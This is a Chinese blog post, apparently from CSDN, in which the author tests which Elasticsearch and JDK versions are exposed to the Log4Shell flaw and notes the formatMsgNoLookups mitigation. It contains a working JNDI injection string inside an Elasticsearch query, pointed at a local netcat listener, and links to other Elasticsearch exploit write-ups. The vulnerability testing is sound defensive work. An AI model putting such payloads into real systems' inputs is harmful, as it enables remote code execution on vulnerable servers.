Elasticsearch与最新的log4j2零日漏洞

最新推荐文章于 2024-08-21 10:06:57 发布
最新推荐文章于 2024-08-21 10:06:57 发布
阅读量7.1k 收藏 2
点赞数 2
分类专栏: 点火三周的Elastic Stack专栏 文章标签: elasticsearch 安全 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013613428/article/details/121884479
版权
本文介绍了针对Elasticsearch的log4j2零日漏洞的个人测试结果。测试发现,只有ES 5+JDK8能复现远程代码执行问题,而其他版本如ES 5+JDK12、ES 6+JDK8、ES 7+JDK8等均未出现此问题。通过设置-Dlog4j2.formatMsgNoLookups=true可以防止5.6.16+JDK8版本的问题。尽管如此,建议等待官方的正式通告和解决方案。
摘要由CSDN通过智能技术生成

今天真的是焦头烂额,新出来的这个log4j2零日漏洞看起来杀伤力极大,影响了Apache Struts2, Apache Solr, Apache Druid, Apache Flink等重量级的开源项目。当然也包括我们的Elasticsearch。在官方正式的通告、解决方案,补丁出来之前,我这里先简答说一下我个人的测试结果(注意,不代表官方!)

划重点:

我个人的测试结果是:只有ES 5+JDK8能复现。ES 5+JDK12,ES 6+JDK8,ES 7+JDK8均无法进行远程代码执行

测试方案:

  • 使用nc命令,查看网络连接情况,这里我监控的是1388接口: nc -l 1388
  • 构造特殊查询,使ES打印出会访问1388端口的ldap语句:
// 输入代码内容
{
  "query": {
    "bool": {
      "filter": {
        "bool": {
          "must": [
            {
              "term": {
                "call_date": "${jndi:ldap://127.0.0.1:1388/a}"
              }
            }
          ]
        }
      }
    }
  }
}
  • 然后查看特定端口会不会被连接

最低0.47元/天 解锁文章
点火三周
关注
专栏目录
ElasticSearch 命令执行漏洞(CVE-2014-3120)
weixin_59086772的博客
01-04 2010
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1465
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
Elasticsearch 中缓解 Log4j2/Log4Shell 漏洞
Elastic 中国社区官方博客
12-16 2231
作者:Philipp Krenn 原文:Mitigate Log4j2 / Log4Shell in Elasticsearch 注:本页面内容为本人截至2021-12-14 18:30 UTC的当前理解结果。 Log4j2 安全问题 (CVE-2021-44228),也称为 Log4Shell,影响版本 2.0-beta9 到 2.14.1 并在日志库的 2.15.0 中修复,很糟糕。远程代码执行 (RCE) 的漏洞得分为 10 分(满分 10 分)——利用它很简单。 全面评估应用程序的风险也很复
Log4j2-Elasticsearch 集成指南
最新发布
gitblog_00890的博客
08-21 974
Log4j2-Elasticsearch 集成指南 log4j2-elasticsearchLog4j2 Elasticsearch Appender plugins项目地址:https://gitcode.com/gh_mirrors/lo/log4j2-elasticsearch 项目介绍 Log4j2-Elasticsearch 是一个高效且灵活的插件,旨在将Apache Log4j2日...
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
qq_40864421的博客
12-14 5713
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试
ADummy的博客
02-24 367
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: import java.io.*; new java.util.Scanner(Runtime.g
Elasticsearch未授权访问漏洞
12-22 7287
  Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.7+ 下载地址:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载,...
elasticsearch log4j 漏洞修复
weixin_43725548的博客
12-14 6376
项目场景: ES版本 : elasticsearch-7.6.1 问题描述: 最近被曝出来Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码 数据传输过程中数据不时出现丢失的情况,偶尔会丢失一部分数据 查了一下服务器,发现 ES 服务刚好使用了 Log4j。现在国内写的人比较少,我便记录一下 解决方案: 查询出都 ES 服务都哪些地方使用了该文件(我这里将 log4j 已经替换成了 2.15 版本,替换前的版本好像是
刚刚公布的 Log4J 的史诗级安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5405
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞零日漏洞利用(zero-day exploit)的程序对网络安全具有..
Log4J自定义Appender:扩展日志处理能力,专家级技巧
[Log4J介绍与使用](https://springframework.guru/wp-content/uploads/2016/03/log4j2_json_skeleton.png) # 1. Log4J自定义Appender概述 在IT系统中,日志记录是一个不可或缺的组件,它帮助开发者和系统管理员追踪...
Elasticsearch
weixin_55261016的博客
06-15 769
ELK是包含但不限于Elasticsearch(简称es)、Logstash、Kibana 三个开源软件的组成的一个整体。这三个软件合成ELK。是用于数据抽取(Logstash)、搜索分析(Elasticsearch)、数据展现(Kibana)的一整套解决方案,所以也称作ELK stack。 本课程从分别对三个组件经行详细介绍,尤其是Elasticsearch,因为它是elk的核心。本课程从es底层对文档、索引、搜索、聚合、集群经行介绍,从搜索和聚合分析实例来展现es的魅力。Logstash从内部如何采集
防范网络攻击与系统漏洞:【Debian Linux安全加固】
网络攻击与系统漏洞概述 在当今数字化的世界中,网络攻击和系统漏洞是信息安全领域的两大焦点问题。网络攻击通常指通过恶意软件、社交工程或其他手段非法入侵他人网络或系统,以窃取信息、破坏数据、或控制受影响...
elasticsearch-6.6.0 关于Log4j2远程代码执行漏洞的处理
weixin_44855207的博客
12-23 1587
问题 Apache Log4j2远程代码执行漏洞 elasticsearch 6.6.0 版本使用的是2.11.1版本Log4j所有也存在这个漏洞,需要进行log4j升级。 测试过的版本:6.6.0 和5.6.5 解决办法 首先扫描log4j的jar包文件位置。每个人和公司扫描的方式不一致,在这里就不写了。 下面是我扫描到的我的es中的log4j, [VULN] version:2.11.1 /export/servers/es/elasticsearch-6.6.0/lib/log4j-core-2.
Elasticsearch未授权访问漏洞(Es未授权访问)
热门推荐
m0_67402564的博客
04-18 1万+
Elasticsearch是一个开源的高扩展的分布式全文检索引擎,它可以近乎实时的存储、检索数据;本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据。Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。 当ElasticSearch的节点启动后,它会利用多播(multicast)(或者单播,如果用户更改了配置)寻找集群中的其它节点,并与之建立连接。这个过程
Elasticsearch 未授权访问漏洞
龙卷风摧毁停车场
03-08 5948
ElasticSearch 是一款 Java 编写的企业级搜索服务,启动此服务默认开放 HTTP-9200 端口,可被非法操作数据。
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
weixin_45366453的博客
07-02 430
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值